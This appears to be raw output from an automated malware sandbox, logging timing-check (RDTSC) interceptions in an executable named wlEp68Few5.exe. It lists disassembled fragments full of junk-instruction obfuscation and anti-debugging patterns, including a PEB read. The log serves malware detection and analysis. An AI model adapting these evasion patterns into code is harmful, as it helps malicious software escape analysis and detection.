Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0712B second address: E07136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07136 second address: E0713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0713A second address: E07160 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EC8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07160 second address: E07164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07164 second address: E071B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F951A9EC7h 0x00000015 jmp 00007F6F951A9EC5h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E071B9 second address: E071BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0732B second address: E0732F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07461 second address: E0746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6F946E7E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0746D second address: E07479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D258 second address: E0D25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D25F second address: E0D287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F951A9EBAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D287 second address: E0D28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FD9D second address: E0FDA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEA8 second address: E0FEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEAE second address: E0FEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEB2 second address: E0FEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEB6 second address: E0FEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEC3 second address: E0FEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F6F946E7E3Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F6F946E7E43h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEF6 second address: E0FF2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007F6F951A9EC5h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E1012E second address: E10132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10132 second address: E10145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10145 second address: E10189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F6F946E7E36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6F946E7E49h 0x00000014 nop 0x00000015 mov dword ptr [ebp+12456353h], edi 0x0000001b push dword ptr [ebp+122D26A8h] 0x00000021 push C78B3020h 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007F6F946E7E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10189 second address: E1018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E1018D second address: E10192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10192 second address: E10198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120062 second address: 712013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F946E7E47h 0x00000009 xor esi, 3FD1616Eh 0x0000000f jmp 00007F6F946E7E49h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov bh, 2Eh 0x0000001c pushfd 0x0000001d jmp 00007F6F946E7E44h 0x00000022 and al, 00000018h 0x00000025 jmp 00007F6F946E7E3Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e mov edx, esi 0x00000030 pushfd 0x00000031 jmp 00007F6F946E7E40h 0x00000036 or eax, 3E5E8278h 0x0000003c jmp 00007F6F946E7E3Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 mov dh, cl 0x00000048 pushfd 0x00000049 jmp 00007F6F946E7E41h 0x0000004e jmp 00007F6F946E7E3Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov eax, dword ptr fs:[00000030h] 0x0000005b jmp 00007F6F946E7E46h 0x00000060 sub esp, 18h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 mov bx, ax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712013A second address: 7120157 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 096Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F6F951A9EBBh 0x0000000e pop esi 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120157 second address: 712015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712015B second address: 712015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712015F second address: 7120165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120165 second address: 71201A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, EDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d jmp 00007F6F951A9EC7h 0x00000012 mov ebx, dword ptr [eax+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6F951A9EC5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201A3 second address: 71201B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201B3 second address: 71201E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6F951A9EBCh 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6F951A9EC7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201E4 second address: 71201EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201EA second address: 7120200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [770206ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120200 second address: 7120212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120212 second address: 71202A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F6F951A9EC4h 0x00000013 mov ebx, eax 0x00000015 pop eax 0x00000016 call 00007F6F951A9EC7h 0x0000001b push eax 0x0000001c pop edi 0x0000001d pop ecx 0x0000001e popad 0x0000001f jne 00007F6F951AADB2h 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F6F951A9EC7h 0x0000002d and eax, 640F47FEh 0x00000033 jmp 00007F6F951A9EC9h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c movzx ecx, dx 0x0000003f popad 0x00000040 push esp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202A6 second address: 71202AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202AA second address: 71202AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202AE second address: 71202B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202B4 second address: 7120327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 sub al, 00000058h 0x0000000c jmp 00007F6F951A9EBBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F6F951A9EC8h 0x00000018 xor esi, 2BF683B8h 0x0000001e jmp 00007F6F951A9EBBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6F951A9EC5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120327 second address: 712035D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6F946E7E3Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d call dword ptr [76FF0B60h] 0x00000013 mov eax, 7571E5E0h 0x00000018 ret 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007F6F946E7E43h 0x00000021 pop esi 0x00000022 mov cx, di 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712035D second address: 712036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push 00000044h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712036F second address: 7120373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120373 second address: 712038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120422 second address: 7120426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120426 second address: 712042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712042C second address: 7120467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6F946E7E48h 0x00000015 and esi, 327AB048h 0x0000001b jmp 00007F6F946E7E3Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120467 second address: 71204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6F951A9EC3h 0x00000011 adc cl, 0000003Eh 0x00000014 jmp 00007F6F951A9EC9h 0x00000019 popfd 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e je 00007F70050290B7h 0x00000024 pushad 0x00000025 mov edi, eax 0x00000027 movzx eax, dx 0x0000002a popad 0x0000002b mov eax, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6F951A9EC3h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71204CE second address: 7120509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120509 second address: 712050D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712050D second address: 7120513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120513 second address: 712054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6F951A9EBCh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f jmp 00007F6F951A9EBCh 0x00000014 mov dword ptr [esi+08h], eax 0x00000017 pushad 0x00000018 mov di, si 0x0000001b push eax 0x0000001c mov bh, 8Ch 0x0000001e pop esi 0x0000001f popad 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712054A second address: 712054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712054E second address: 7120568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120568 second address: 7120583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120583 second address: 71205EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 pushfd 0x00000011 jmp 00007F6F951A9EC8h 0x00000016 xor cl, 00000008h 0x00000019 jmp 00007F6F951A9EBBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+50h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6F951A9EC5h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71205EA second address: 712063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6F946E7E43h 0x00000015 add si, DE5Eh 0x0000001a jmp 00007F6F946E7E49h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712063B second address: 712068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d jmp 00007F6F951A9EC4h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007F6F951A9EBEh 0x0000001a pop eax 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712068C second address: 7120691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120691 second address: 71206E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007F6F951A9EBEh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d mov si, 36FDh 0x00000021 mov cx, 45F9h 0x00000025 popad 0x00000026 mov dword ptr [esi+20h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71206E4 second address: 71206E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71206E8 second address: 71206EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71206EC second address: 71206F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71206F2 second address: 712073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 2439D2A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e jmp 00007F6F951A9EBCh 0x00000013 mov dword ptr [esi+24h], eax 0x00000016 jmp 00007F6F951A9EC0h 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e jmp 00007F6F951A9EC0h 0x00000023 mov dword ptr [esi+28h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712073B second address: 712076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F6F946E7E48h 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712076A second address: 712076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712076E second address: 7120774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120774 second address: 7120783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120783 second address: 71207B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F946E7E3Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207B5 second address: 71207BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207BB second address: 71207BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207BF second address: 71207DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EC2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207DF second address: 71207F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207F1 second address: 71207F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71207F5 second address: 7120845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F946E7E3Dh 0x00000016 sbb ch, 00000066h 0x00000019 jmp 00007F6F946E7E41h 0x0000001e popfd 0x0000001f jmp 00007F6F946E7E40h 0x00000024 popad 0x00000025 mov word ptr [esi+32h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bl, 66h 0x0000002e mov al, ECh 0x00000030 popad 0x00000031 rdtsc
